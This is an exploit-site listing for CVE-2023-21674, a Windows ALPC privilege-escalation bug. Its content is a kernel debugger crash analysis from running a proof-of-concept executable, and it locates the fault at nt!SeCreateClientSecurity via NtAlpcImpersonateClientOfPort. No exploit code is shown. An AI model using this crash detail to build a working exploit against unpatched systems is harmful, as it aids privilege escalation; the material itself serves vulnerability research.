Share
## https://sploitus.com/exploit?id=2E1E7548-DCD8-5F90-8769-9716BCD64AAA
First in-the-wild 0-day of 2023 ๐Ÿ”ฅ
CVE-2023-21674 is a vulnerability in Windows Advanced Local Procedure Call (ALPC) that could lead to a browser sandbox escape and allow attackers to gain SYSTEM privileges discovered by Avast

-------------------------------------------------------------------------------------------------------------------------

```md
kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: ffff98061bbf8820, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff8021a7120a4, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 0000000000000002, (reserved)

Debugging Details:
------------------


KEY_VALUES_STRING: 1

    Key  : AV.Type
    Value: Read

    Key  : Analysis.CPU.mSec
    Value: 1562

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 1654

    Key  : Analysis.Init.CPU.mSec
    Value: 421

    Key  : Analysis.Init.Elapsed.mSec
    Value: 13937

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 76

    Key  : WER.OS.Branch
    Value: ni_release

    Key  : WER.OS.Timestamp
    Value: 2022-05-06T12:50:00Z

    Key  : WER.OS.Version
    Value: 10.0.22621.1


FILE_IN_CAB:  MEMORY - Copy.DMP

DUMP_FILE_ATTRIBUTES: 0x1000

BUGCHECK_CODE:  50

BUGCHECK_P1: ffff98061bbf8820

BUGCHECK_P2: 0

BUGCHECK_P3: fffff8021a7120a4

BUGCHECK_P4: 2

READ_ADDRESS:  ffff98061bbf8820 Special pool

MM_INTERNAL_CODE:  2

BLACKBOXBSD: 1 (!blackboxbsd)


BLACKBOXNTFS: 1 (!blackboxntfs)


BLACKBOXPNP: 1 (!blackboxpnp)


BLACKBOXWINLOGON: 1

PROCESS_NAME:  CVE-2023-21674-POC.exe

TRAP_FRAME:  ffff838564a3f660 -- (.trap 0xffff838564a3f660)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffff9805f9a9c600 rbx=0000000000000000 rcx=ffff98061bbf8600
rdx=ffff9805f0492f24 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8021a7120a4 rsp=ffff838564a3f7f0 rbp=0000000000000000
 r8=0000000000000000  r9=ffff838564a3f920 r10=0000000000000000
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
nt!SeCreateClientSecurity+0x54:
fffff802`1a7120a4 4c8bb120020000  mov     r14,qword ptr [rcx+220h] ds:ffff9806`1bbf8820=????????????????
Resetting default scope

STACK_TEXT:  
ffff8385`64a3f438 fffff802`1a480701     : 00000000`00000050 ffff9806`1bbf8820 00000000`00000000 ffff8385`64a3f660 : nt!KeBugCheckEx
ffff8385`64a3f440 fffff802`1a24fe4c     : 00000000`00000000 00000000`00000000 ffff8385`64a3f5f9 00000000`00000000 : nt!MiSystemFault+0x2337d1
ffff8385`64a3f540 fffff802`1a437ddd     : ffff8385`64a3f6c0 fffff802`1a27419e 00000000`00000000 ffff9805`dd22f000 : nt!MmAccessFault+0x29c
ffff8385`64a3f660 fffff802`1a7120a4     : 00000000`00001301 ffffb989`a4084ce0 00000000`00000000 00000000`000009e8 : nt!KiPageFault+0x35d
ffff8385`64a3f7f0 fffff802`1a711dba     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!SeCreateClientSecurity+0x54
ffff8385`64a3f890 fffff802`1a711b9e     : ffff9805`fbffee20 ffff8385`64a3fb20 ffff9805`fbffee20 00000000`00000000 : nt!AlpcpImpersonateMessage+0x11a
ffff8385`64a3f9c0 fffff802`1a43b968     : 00000000`000000d4 ffff9805`fbffee20 00000000`00000000 00000000`00001210 : nt!NtAlpcImpersonateClientOfPort+0x15e
ffff8385`64a3faa0 00007fff`bc8cfe24     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x28
000000da`8352f238 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`bc8cfe24


SYMBOL_NAME:  nt!SeCreateClientSecurity+54

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

STACK_COMMAND:  .cxr; .ecxr ; kb

BUCKET_ID_FUNC_OFFSET:  54

FAILURE_BUCKET_ID:  AV_VRFK_R_(null)_nt!SeCreateClientSecurity

OS_VERSION:  10.0.22621.1

BUILDLAB_STR:  ni_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {9ec8eba5-8500-2db9-9fec-a2667249961f}

Followup:     MachineOwner
---------
```